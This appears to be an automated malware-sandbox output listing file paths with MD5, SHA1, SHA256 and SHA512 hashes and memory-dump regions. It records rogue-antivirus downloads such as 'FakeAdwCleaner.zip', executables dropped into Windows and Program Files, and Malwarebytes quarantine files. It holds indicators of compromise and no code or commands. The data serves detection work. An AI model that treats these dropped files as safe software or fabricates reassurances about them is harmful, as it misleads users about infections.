SHA512 187c6a091fc305323bab2c1feee6e71461b06d13f93a02c8afa1850505d292f7ae7362d8e13c96c5b8058e8e246c28f76185f6f9f76ae91ba9b40514f069f858

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D3A.tmp

MD5 845560bcc65c3784816ba4e988d85bec
SHA1 66265412e628e723a21f722d2698739f0e359d94
SHA256 065c7b8db6662f415c1b3f04f3fa09e35ca43fc53909eafd7485577d470bf2f2
SHA512 28f3142e2161a3620356fd4cac403ced781406a42dd8cef83208037a38a5fa5167aebbe4b98b97e8388e3ece756066fb772fa4b694f5372244324b3c113237c9

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D3B.tmp

MD5 1eda81f22f0863e1662efbe0311844d3
SHA1 0beb5019378197c3703f3ba9c67a463bc2eefa5f
SHA256 458c59491cf076aab350f8fbfb482fb70a17a796d28af47dcef77cb5ed2f790e
SHA512 f3c704fe2e3edc8b0e3d42f39bfcf92ab6b1394f8236e900b4c585c4ecf0a1f62c016f96b2173605388ae005ed3f89b874dbc0406b2d88c770b4a1cf375503a3

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D3C.tmp

MD5 48218aa6a473255fe6d47dcf3f0b7d6b
SHA1 65f9f03c3131da53389e3250a255eda418f18fc8
SHA256 76e459a20b870b91c42f525155ba94e8e2aa0ce82c4da46bdf2386321f6378b3
SHA512 bbf5edaf94bd8356dae4bfe63967c75044cf03c1844a67628f5b30e70a0d82dc74340466147614b48ffb48de25326bc28a2f366f776f9fb6bed98512aa275161

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D3D.tmp

MD5 c766f0cc2a1fd0ff576ac55ed99de0fa
SHA1 c197e48089ac18954e28d5ddb9f1a4f5bcfd0be1
SHA256 f2c36524bf323a247d1dd01466db0dc1325f696055544d2205e0ca68ff2f23a5
SHA512 67b358911f71c3504cf5488c976af09719831049fe0d656958f047798446289e3aeef95b00f7e6758246274597736fac690fb0447b09cb464851473438f7ce3c

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D4D.tmp

MD5 fdef46591792567191a40baef0808544
SHA1 0885df3d12a74b149f5154a24b0a98377b33821a
SHA256 5ecec2031c3bb1a30800faca8442ba24bfca14cd39294b5af81501254cd03809
SHA512 7c6d593bc5f05d5c7b4c6e169f8ba395b1928626d610a3d0be8172eeac05267555683b2601de8418ba783703baada10fea44457ad46ff633adae9ee4bc04525d

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D6B.tmp

MD5 ee507878a7e2579d2bfda2d03fa84465
SHA1 4e9c9ff4f2672012612ff9f27ade39fa264d337b
SHA256 0b0aed1f8f291cc81d2334b649837ca1d0f13d14d58fbd19cf3a282e80f299e1
SHA512 569e1036c930a401983747eb9d7c1aeff71e359d7d2e0a301479c255f24fdfb9e41b3585b0918dbaac12e2b5afc3f5710455fae1222adde763850e0364cc01ea

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D6A.tmp

MD5 54dde63178e5f043852e1c1b5cde0c4b
SHA1 a4b6b1d4e265bd2b2693fbd9e75a2fc35078e9bd
SHA256 f95a10c990529409e7abbc9b9ca64e87728dd75008161537d58117cbc0e80f9d
SHA512 995d33b9a1b4d25cd183925031cffa7a64e0a1bcd3eb65ae9b7e65e87033cd790be48cd927e6fa56e7c5e7e70f524dccc665beddb51c004101e3d4d9d7874b45

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 b05fe585e4183a68162e6d162cc1aa48
SHA1 f435b940e41797704c32cc49deba5ad971753930
SHA256 6fb665345d86bd8f8d74f0acc11c543d72f143880c354042e5380beedfedb4d1
SHA512 cef54a9403a4e76ee8123d04f656edbf497a8be9a84605401237c1032d4d22745cee51db7351ece5873b3cd08c19d1817ec906b22fc4968b4fc9625dc1023e83

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 1d70f65e3acd12ecb8953894273a801c
SHA1 027077ce0738424b26ba2709eb199cf925564c96
SHA256 7e39303247da05a1cebc51650f5791774ba86dd022f6f2f327ca2f74a37d377d
SHA512 27f164f38c7ecbefe558eae20b664835ab53dbc1db7a121364d66d3e5290ade244e88c3067b9ddeb281a477b46b87aa3a03bfc834d5070bda6b0624304da2437

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 6a3d671eb7a340f7e66e469698a0c120
SHA1 6038cb12b450c65cf13e2b8da722b9c59df64323
SHA256 de8461573a21593c144665b246fa9a20fb70d37e3a701a61f32862c330351532
SHA512 1987131b797d06238b23c5334daecde27fc600167d319ca102927ca76759a1d2a9ee0d03cd89a35166e7dac696114ed3e9c9dc5c8a0ac134f2c5b0652e1fba5e

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 b80135c64520a88b6ca81687e76875cd
SHA1 5e1e31c71daf22047191e04e17837f3da618e5a0
SHA256 0ceee7f662e8cf3997468c28af83429a89a358abf185c4c8519747b303582cf1
SHA512 cc3adbc0380f49dcde92d95dffc5b06c13c836291af4841e413fcd1bd286208be3d4464684a0c6820d62b207e6e92ea7469f4963fc3f97779fc1715433743701

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 c1692e0ae37feef95be31a154a36a5b6
SHA1 70f723e05daf36276c8746205458e2691265653d
SHA256 c3ed0bfe4a127a18fa15146ecb76241d9407c6a11e84aa9d4f33dbb2e646732f
SHA512 b648b79dc009214a60ca51c6c2e0633b0727f64721dbb2615215e08c9968c19952edd4e7aded26e0c5bb2c8e922685baba99f9125112bfa87c6e6982baf80181

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 6f984181126efa53cd6e6b72321f75c4
SHA1 fa4e268e97ee33fd1121c5691e4b41402516c9d4
SHA256 b2bb80c33ec01c73740b8ce6b020cee926db6e0155aea4d9a15db1c002635b6f
SHA512 cf1bb35e7d463cc874575cf711f9ea88a9e8d5152b056abb678d3282aecec9ef778d5c0267eb5fa0deba6f1db32d16e016f4aeeee7aef31fb9b08dde546d403d

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 b84d1b189b0679267607e1ca4bcd66d8
SHA1 fb1bdce3d08d321e3fb564a86d2edbc7acb2f400
SHA256 bd04e6d2999eabda6028fbb53c12c1aa84ce2f94bd0d712d122801d1c503ff69
SHA512 508b7cc791a398a7e81e209c84b7016b46dff0a96b1f55658843e06bfe77d01a88f9446b62fe8ef6c15b16c27010076b53e3b5315188b494e45f05d2e35bcfa6

C:\ProgramData\Malwarebytes\MBAMService\638b85f3-170c-1351-1b6dd16fa101b873

MD5 856f6ba813d0bd232817be42d277fe0c
SHA1 a9f8be1ce91f9b8fa7e967ad30dc5c50cd6b9b5e
SHA256 f4fced4fbba70a23e261cba1b765d734de2cbed3c8996095117375906f6b8a23
SHA512 f5f88a23541f25ad880b30758fe835001a2f2fa1668ff524eb7e7d6c8c4e03b6c319101d5cd7e7a0117bbb648b7e2543d75c823814492b5d655adade4bd178df

C:\ProgramData\Malwarebytes\MBAMService\tmp\aa51688cea3411ee980662d9003ae027

MD5 5fd1bef64e587bf3e705e368f9e0e9b9
SHA1 b32d7705c277687e8fd324ba73d8f251f7aa6706
SHA256 b3d276f72bfdad28c431d4be37ea8519ff4a61a436206576ca0eebc59f3e2ca3
SHA512 650356e0eb47587197d6d02c3a51e391c12c0208d0a0d0b6dde67e0f0bfccc4af47c830b1514f81cef4792df74c9c5bde14db1efcde3d00b9cc358b20ecd998f

C:\ProgramData\Malwarebytes\MBAMService\tmp\aa737044ea3411eea09062d9003ae027

MD5 3cce544e0fd4a56eae47687b8ecba334
SHA1 4882c2dea29c878c484f0d39f326fd64cda129c4
SHA256 bb7ab80e4ce20bbd693e47e32d2d2b6a5c27a2c242678443a841abe0ccfdf6a4
SHA512 ac62c4527c5d759d142bfa98d7ebd1a0cd31ffcc7c1c8f0ab88948c0e8b7c8423730683d11ed668c856d57509aa7251efac8e4526c94944e20b2a7a9739de684

C:\Program Files\Malwarebytes\Anti-Malware\expapply64.dll

MD5 99c8e47d747b36be8ffcfdd29b80dc3d
SHA1 9b8e87563fee31abf90bded22241f444b947b071
SHA256 0db4dcdf3fbeef2c4d18555f479a28dde3d67ee6f0d27c18925207142b7a38f7
SHA512 f9cf4ec06585c6cde57011884141782bde83adf186f57f75576c8dade1e868d6b886daf8fa15c55ac908ff995c4b6323c3a8266dbd664b807cd67cf788f7074e

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json.bak

MD5 b8c401fa16b44c45b9552a62411303ba
SHA1 abf14d96ebda7126b6b2c82e363a94c8c66f136a
SHA256 ed33a50daf05dee2b5981825e841b0b2ae33d7d6665ec490ef13fd0e39cf6d3f
SHA512 fddefb3902d3ce9998dfd0c70ea976a1614096c44ae563a50303a7abff9ed102fba7f23491f7b1ce42b7aab3ef8ce4044929f9ab364b0a083a8cfc53ce3ab1c9

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 83cfa0f8249d6f2552ab11f8126b2e99
SHA1 d3bb7c9667f27fd1ed5da7809b3a314ef0e85c61
SHA256 10d1cbe5b288091ea2b988f6310561f8f28bdae67b9772452fa0d5c60fe49e15
SHA512 5beca1824949728762e9cde9054c0037f42a8218b822f6bc9666b84c40d187c43c5e43c414c55bdce084197fd8899fad4e50473502b78236014d2e8867846cbe

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 3c082e78b8ce14d56fbf72a39141bda3
SHA1 769f186dcf4b9b940186ab4218587452b52c41d6
SHA256 ff8d7a657d42a1fc998e2cdf83458cf73615cd6eb96d786d07f6524d52195bdc
SHA512 c80e46949d39f6fa99d0108d53e28d7d0b1a4c24a8e5a04a766916715b181946c680d050aa18a241f6ec55f129e1ccd51802797ba199fe1d3fd8d3aa3205cc37

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 76f5ec892178d9615305187f27aae1e8
SHA1 bf09f136ff989d5e462ffc21c94798bb6dc0dabd
SHA256 d2ff2d7929b0feb04c4ab02f3b75c34b5ea225eed45b501052e671052aa3918a
SHA512 2a8347211bfdb007922260c2bed5b37747fbbb939b92ef6451a3ee5dea208327bb1e4abd248a59e0584d3a1b859824eaff49e8401279d05212e8cf002f090703

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 a3ccdc4e40340076796704de7882e5c5
SHA1 f62ad9ce18a101be8e7de253e053bf174a308f86
SHA256 1fae457d2474e63e9a5b129b494dc1200a941610dcd620fc771f9222baaec135
SHA512 3170ec9b0d277fd94f13725cd7c1714ec6e6353161375c821c6285bf76577485609353f09a88821f0a78e45b68d8f4a64bdc066a655b4545f01b60eaae26c6fa

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 615588c29e07f7371bbb0c047c5ab7fb
SHA1 33b729dfd47d4d294fa4995b16618ae9ae0bebed
SHA256 f9163f1bd9b1fb2db12f337014c323b77a41395e7e823c444e390dcc643084a6
SHA512 be8d297ffc6f9ea7cc34af4d1f02f435550e650cdbf6e1bbc5e3a66f72465e6eee41c0b279f860e311987f0bac6c7a11ac50fd2ee927d4ee1722dee2523440b1

C:\ProgramData\Malwarebytes\MBAMService\ScanResults\7219a01a-ea34-11ee-a180-62d9003ae027.json

MD5 c776c674c371983bdc7f64b0603381b3
SHA1 a8584e049c43da747927496ef5a25ce8266a58ce
SHA256 3998b1cbfd5ddd63b298d8f0e0e8be8629fd1e62bfdf258d30f856e900bd15a5
SHA512 a10b0afbb6b87516a5d64660a9779763efe7af0962ffe7568d9021bd1780cd56295055beb9db88393827b520a2a727932d727a6922f6fc1a49932ca3d797f33f

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\a0166444-ea34-11ee-98f5-62d9003ae027.quar

MD5 85b1e8d44304519cd277168764f08495
SHA1 bb507dd7be3bd2196c32dd53c75cae73e165a572
SHA256 e60576a807b337cc942167969d7ea1c235360a5d966d7ab73887ea1faadde731
SHA512 76f708a0354af0b6b9bb2555c455f4def0f47e1f1dfd52bd58772191fd31b974945da684b69d64024c102a1c7169c58b3d9f5a0cdf455fd1c0477664eb0929f0

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\a57f4720-ea34-11ee-ac25-62d9003ae027.quar

MD5 799b9c7f1342355ab5199e4cd0ed193f
SHA1 24186c916582edc952dffb43954550c8055dc2a1
SHA256 f2036993f75be6ebbc74eff5626590b6a54b384a858ddea8e1321fed53d42022
SHA512 22b3f975ed2a54fefb7a4b43928426a7d2a443eb3cccefa5e882fe3208cabcf23f5e5c9c6fd4d0f46014f9959968c57aa0eb9132d5baeb095e8d227746f7764b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 afcebe9ec517642ce88d1b91f64f6d0b
SHA1 e0fa65af5831745d8f79f9fa20812625920bb73e
SHA256 4a66447f2ed3d05ff3b7d008d7a80ef0f173fc8985b28f07aced6479ad0b14c8
SHA512 a85e787da267c448de4b7aa9861f6c27fb2f0f22f30c587f3b6796a51caa9d87e9c3e6cf04cf72bab148ebc4c3abd63c75b2125ceb27ed49ed6f40dba3de1b16

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 589c49f8a8e18ec6998a7a30b4958ebc
SHA1 cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e
SHA256 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8
SHA512 e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62dd25f5a7ba51e51597e2173cdc4bdd
SHA1 f700d75d6af15fe186e87286c07587e17d276bec
SHA256 1486fd22477e966f37d385cbbfef84f8ea609761772e02fad1b2c1fb0d9df02e
SHA512 867fef190ee2b79bc9852f5544a7abeb133dff60da0812b9471d9d368bae54e80665dd7cb84459d3fa49efa59e9196b945522df1ddaeb793fe77bc824ef54ca8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fa5105b47027f1486522223227c9f3be
SHA1 39a1ce670cf20e8be56352057484c5e156a46192
SHA256 3c1a22ea5d826e1f2dcaa61e1d1034e45ee99254765befed2b3e1a9fa29a7c4f
SHA512 aafbb2c863febf5104ad68dfd3a1e58e2c07e33cbc20a4c02168b52f7648087644b45ce79ea35c9157381666dd6f68d14fb4de1896101313aa229c8f15676787

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eee179ee51994a4e8d69c3471bf59419
SHA1 ea34c6cf4b2b3bef40b104f554b2b63fa94fa041
SHA256 4fb7c3d775abf9fec9a8cffc144a95c62f3b3a365d6eb0b14d39305a51b79e45
SHA512 52112a51a2bf9e793d26132b29f92602e0e0504ed07cae34dc04bb7b26ab36679655189ad3b48b64b23df15d9211f16c426d94c7f0ca93139fbdbaa62c07e1c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 735f71dcb5ae1482187ffb54a8ad5a8c
SHA1 109450425c396b004495b6976aacbc22fcf3bfd8
SHA256 6d6fe913e7778c8193e982ab14b5eed23397da6f3c9c295b07e06f8bcff0d0dd
SHA512 b69cd8cdee3d6fb15f46e96055839e8cfc4887589df6be64cad20bcff973d4137f92bb1718cb9936c77e5ee6d3a9c06dd99ea61bf84e16a9324337b53dc820d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe6649c2.TMP

MD5 2055d361e2a6be754c12b293ec287053
SHA1 98f7cdb510cc0777c375d38ffebda0658eb5da87
SHA256 dbf559898392793c3370f80fdc3222352759236245cef82801a7fd9a000abc21
SHA512 26f14517fdae00979577d664778d6073dd7f8712d4f0e719af5b6cfc658cfaf9acc1c39f2b962500e81152c8396872353b92c32d22e8a73162796e5119e63c73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f3895225f691b57c425f1341172db287
SHA1 4c364cd05717e829c8b7d4ea340e93f60f75fc05
SHA256 2bd41acf7fb419f8b8240eff12d53ec3a2dac239fd2b35ec999550e5aaa3bed6
SHA512 c90b039b3c1c130c6b347d56333f07c981722df759d368b9d72b17d48d0e4b6632897af98877451f1785cb76b8ad684377af93119f426bee3191f4593447cfe9

C:\Users\Admin\Downloads\AnViPC2009.zip

MD5 9a38c29ff9e12ba2892381eb51c79934
SHA1 76fcf6bcaac32f624fa0154a9177e44469b5886a
SHA256 45b75a116aa3b07f90a7c2d9a83c2cde524797df88bb5e20f9dc1e74d8527861
SHA512 c26d8c252d6f18a2ae4419bbfe27099862a625cbc40d8f104fa20cb361da112ebe6a17935ac3613c24b58f9c291d2219e55f59e0fa40b81f92fccf190115e734

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 06df33a7991debbdf5402068d09a3e4e
SHA1 0f39396e4a4c04f1359858ac510ad112f30b0350
SHA256 1134e93270165839e45dabf19e06339185db5216a1439fa0e83061cfad569a59
SHA512 05f458e513e39af3cd29b8490ad20578ca3fc3931b1b1d062d47b2e767afcde5e80b1ccce020161753c047db2f44064469d1df5f0cc31dab1b4e67ed96b0a07f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060

MD5 1876b2d886ec392d71f37423dfef0c11
SHA1 af78db6206cada4f780f030d45fcaa881f892a99
SHA256 61ff034c476d4060fbea6debc5f84494cf02f337a9a897ddb6b3eb3a28c16406
SHA512 9070d1c35ddc045c7d5aa7938d231d139437c0b363c72a71d1edf3b77ea40484869c92e3dc9b021c2897d224d3f2b6bcf64b4dcf44149da9d6cc15d4dfa9951e

C:\Users\Admin\Downloads\Antivirus Platinum.zip

MD5 ff84853a0f564152bd0b98d3fa63e695
SHA1 47d628d279de8a0d47534f93fa5b046bb7f4c991
SHA256 3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2
SHA512 9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb

C:\Users\Admin\Downloads\Antivirus Pro 2017.zip

MD5 ab1187f7c6ac5a5d9c45020c8b7492fe
SHA1 0d765ed785ac662ac13fb9428840911fb0cb3c8f
SHA256 8203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a
SHA512 bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4aed2a4f-1ae9-44f6-b46a-15d10f849327.tmp

MD5 79f86031a27f0228926bae6530e0ad0d
SHA1 7858e5a0c1894c0a7ac51890304e4faeff1596dc
SHA256 c318ab15cd5b4a4efbf2e8facf2c1a8565be67b5fec7da44aa3038727961b6f3
SHA512 c7431cd4d56a4bc869f7d45a31af77e8eac220860f6e5253c9d2a62b21005f82c8b708ee3b784e99a8b0c2092eeb8f14cd18939ebd8cda87ba95dab245f83774

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 19ef7fbc5f03ee17612de96d53f75136
SHA1 c9e836ab20a3cf42c6b458a699773ab7941e677f
SHA256 030b3a5fb12fafccac55c2351956c78b157e8efd978241cda355abca315c9091
SHA512 aa15bfd0b3450de798c63ed2e6d765702ac473db859cd36f9958c3302b7b094503e7270f00ee8dda7c9c41cd8d268f15a1c8208eef727143a5ab1cf0056ed67b

C:\Users\Admin\Downloads\Antivirus.zip

MD5 e1ac4770f42bac0e4a6826314331c6ea
SHA1 66493386ad995819871aca4c30897b6f29ab358f
SHA256 eabf7fdd31c5838d66ccbc3ca52b0f6eaf8120f83eed43f372f21e4d31734b73
SHA512 e691103064075b24b1fc2f5b4d1a1c2701ee7c5074c96a7faaf284f975de3d7309e7a3ea9b80fb6a2d8950a3b12aceb22e3516777508cac70cba8be48527f55c

C:\Users\Admin\Downloads\CleanThis.zip

MD5 fcdf496c1869b16e8c4964b28da8af0b
SHA1 b965397f9fc13ec934b1357ef5754af5c212b7f4
SHA256 37a88b905f8ed19e1bd94fd282f575e2cfc58a83e35e922d1a35a0cc42bd61c6
SHA512 1e560fbc9ae022266d7ec80b5b324c53f43501c113789361aa899999b9d98f9e0f167881a02aa2e534695a0ed32fe989cf4bd13f5c17cb8237a3744a0c424938

C:\Users\Admin\Downloads\FakeAdwCleaner.zip

MD5 6d8c9d01ba5c32aedc734087cc3d0b1b
SHA1 f7e58e5edd203abc2364922b11b6641d3ee9add5
SHA256 92e885d1763e4ba1abc92bee9b08ca7a2ae358bda5fe98b31a8e217327982bf7
SHA512 090b972e7d854dee8c1dc45ee3035247eb8ab641c337ff8da6dc3dbb84fa447deee688f760d36fdfb93cca50d4ab27b5ab3347f75c5e4207a06e0ada0607e3f7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 17c5b7181f693f74f791ceab4d18fead
SHA1 1ecc5e26a999b7836b00490a26cd96ef31e87bd8
SHA256 f3669887ae212e758576fb427775045999da9811caf98fcc1e988a49df9599b2
SHA512 1babfd6e26f29ca42f581c3af8d76cbf5c3c71ee4065e6a5ec5c7b2cd8cb85214fba0d6da0a99574c1982429cf26df4d60459f878f0a9204da515309a39141b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000066

MD5 974918541aa75f380aa6cb4d8bd3c4bd
SHA1 d0a6a3a301cf5330b00281ee8ff04ed9c3455fc7
SHA256 d703fc0de3f07684528bc1931479815a4b9cd7b66fedbb753ca21314a6a300d6
SHA512 db829bba3372a6e452d03d24e998ee91d28e3816c9d1a8d81330d450b24dc695e15d2612ec69729beafb28d95271ba55b6be8b95dbe7f4b15f4f65bf5b5279b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fccaca30bc82d71f5706ab00af1c4114
SHA1 38179e2fca6a0fb00c5d525a79ad9853e5b2ff19
SHA256 1735f593c2c417ffa192ece4b4af47691e45cbc2b9655d958a79d2d167ff8d23
SHA512 1b5f65d4e2901d22d673ec82a78638b40039095487d93d0192c88f904bb3ee18d866dfa37b9da7f20ff4f56e75d70ae08096241461e5a6fc5604bcbb5ba180c0

C:\Users\Admin\Downloads\Live Protection Suite 2019.zip

MD5 7a5994fab80a2ed6adf59a93c7bc2d88
SHA1 fe2ddcefd45c378dfb19817de118fcf151c59b1f
SHA256 6ebad2ea4d537eb1ce11dd19d495fca3e2b8b4e50140d9b241b71f5f1bc71804
SHA512 5ba499f12ed0a5de31350530402327dc323aae7d414ee972bd652265e5226adef71d94c0b52a3bf0ebe8f95081c3c27708758ef15da58163492afdb664e08ad2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ad84c3b3b3f53c910cc872e9dae2d58f
SHA1 7711c4b6203804dbb9f0a474a4f6a9275dd491e5
SHA256 8db7d9345a8c0504a69ff92b67d54d36a0b485f8624ddb80efae2ee9aaf9d9c3
SHA512 7b2ccc16353905192ac454ebac8b31706f071d140a295c407749ca40e69db842b322d656b9904b8fe8ce13a9896d9b3f9e79019402850f66004d33f50fd66d76

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8d8a926f01e5ca8b4f2f111ef2646af2
SHA1 da0e6ae6a96455ef7b374f13086e6f47cb628e64
SHA256 2b772bceb06ad6e16cf71ed17f70c5297283a076dab5e72e038870db0160b3af
SHA512 247f797217df744a77cf737f0ac12b515498437562920e82e183fcdac8ccde1ac963403086b3a8ce8bc02a8174b73b1eccb2f136fdc358b9ad26fa50e28ab953

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 959787244498cff4804cb9e25b8b6b29
SHA1 1ca86967acb7f31d2e5c4d0442f6a3d57d1d36af
SHA256 78374935b6835d967ff489666033e8918d87c7eafefc7d9b44779103d6c32e23
SHA512 056f226da195c0b2b8455daa24564dca993731e643eeac08adfe480e839f341ba3397d7d6a1bd304575a9d43a40797b31356b57e5a6a96c8b1d3aabb6a3d1fa5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 070ed8d55a0408d51739c5248b8ab5e6
SHA1 e8fe89898a6d9ed004bfe656af9353e723fb21e5
SHA256 5c4df3216738334814573fec21a12e9732094a8491ac9814aa3e04c40b1d8600
SHA512 3ca668af4588be29740c46ead5d02acbde5113a10e697d7693ce77d0b2b9af36ed106c4f4734274a4c0f68531be804ce6ee42a69f7ddedcd8e2af56fcc55c5b9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 38ca20e48e097675943e41793a4b2277
SHA1 bd443852f5d8ff21eb16e02ad27e65f65d64be84
SHA256 a97bccc76ad76d3676ed97e1ed54004f0bf92c99f7b88c97dd29f19346c195f2
SHA512 367057b39c351969fe1fd88f637f34fc2fb06e10800c6315fd3c7021930ee0e6797d82f6b3eab1ebd212df563b38b79391ae3309188396392a89871c62db2cbf

memory/5384-10404-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/5384-10406-0x0000000000A50000-0x0000000000A51000-memory.dmp

memory/4500-10410-0x0000000000680000-0x0000000000872000-memory.dmp

memory/4500-10419-0x00000000050D0000-0x000000000516C000-memory.dmp

memory/1556-10418-0x0000000000400000-0x000000000057F000-memory.dmp

memory/4500-10411-0x0000000072450000-0x0000000072C00000-memory.dmp

memory/4500-10424-0x0000000005720000-0x0000000005CC4000-memory.dmp

memory/5384-10422-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/5384-10427-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/5384-10429-0x0000000002C40000-0x0000000002C41000-memory.dmp

memory/4500-10432-0x0000000005210000-0x00000000052A2000-memory.dmp

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

MD5 100b58478dfc9904ba2ee4b5e8f34ccb
SHA1 c124a72961cb96f3310e4427c829979c6fce6377
SHA256 3c6f29413656404f4cedd58f8e7dea5666e3272b3be0042fa2cb128740ed1304
SHA512 c6af1adef5f37e16ceb3e8bae874f624b5f351a6b9aec3d5f07faa3fc1cf2b0e1f27e3ba9e97d6bc78bb470132f06ed2f724d5aac1a0479025c0363d0fedd5f6

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/4500-10456-0x00000000051B0000-0x00000000051BA000-memory.dmp

memory/4500-10460-0x0000000005440000-0x0000000005450000-memory.dmp

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/1556-10434-0x0000000000A40000-0x0000000000A41000-memory.dmp

memory/4500-10459-0x0000000005450000-0x00000000054A6000-memory.dmp

memory/4340-10463-0x00000000011A0000-0x00000000011B0000-memory.dmp

memory/4340-10465-0x000000001BF50000-0x000000001C41E000-memory.dmp

memory/4340-10466-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp

memory/428-10467-0x0000000000400000-0x0000000000410000-memory.dmp

memory/5540-10464-0x0000000000F40000-0x0000000000F6E000-memory.dmp

memory/4340-10471-0x000000001CAC0000-0x000000001CB66000-memory.dmp

memory/4340-10473-0x000000001CC10000-0x000000001CCAC000-memory.dmp

memory/4340-10476-0x0000000001150000-0x0000000001158000-memory.dmp

memory/4340-10472-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp

memory/4340-10469-0x000000001C920000-0x000000001CABC000-memory.dmp

memory/4340-10478-0x000000001CCF0000-0x000000001CD3C000-memory.dmp

memory/5540-10483-0x00007FF8D1EB0000-0x00007FF8D2971000-memory.dmp

memory/5540-10486-0x000000001BBE0000-0x000000001BBF0000-memory.dmp

memory/5540-10487-0x000000001BBE0000-0x000000001BBF0000-memory.dmp

memory/5540-10488-0x000000001BBE0000-0x000000001BBF0000-memory.dmp

memory/4500-10489-0x0000000072450000-0x0000000072C00000-memory.dmp

memory/4340-10490-0x00000000011A0000-0x00000000011B0000-memory.dmp

memory/4340-10491-0x00000000011A0000-0x00000000011B0000-memory.dmp

memory/5384-10492-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/1480-10494-0x0000000000400000-0x000000000040D000-memory.dmp

memory/428-10498-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1556-10501-0x0000000000400000-0x000000000057F000-memory.dmp

memory/5384-10503-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/4500-10505-0x0000000005440000-0x0000000005450000-memory.dmp

memory/4340-10506-0x00000000011A0000-0x00000000011B0000-memory.dmp

memory/5384-10504-0x0000000002C40000-0x0000000002C41000-memory.dmp

memory/4340-10507-0x00007FF8D3870000-0x00007FF8D4211000-memory.dmp

memory/1556-10513-0x0000000000A40000-0x0000000000A41000-memory.dmp

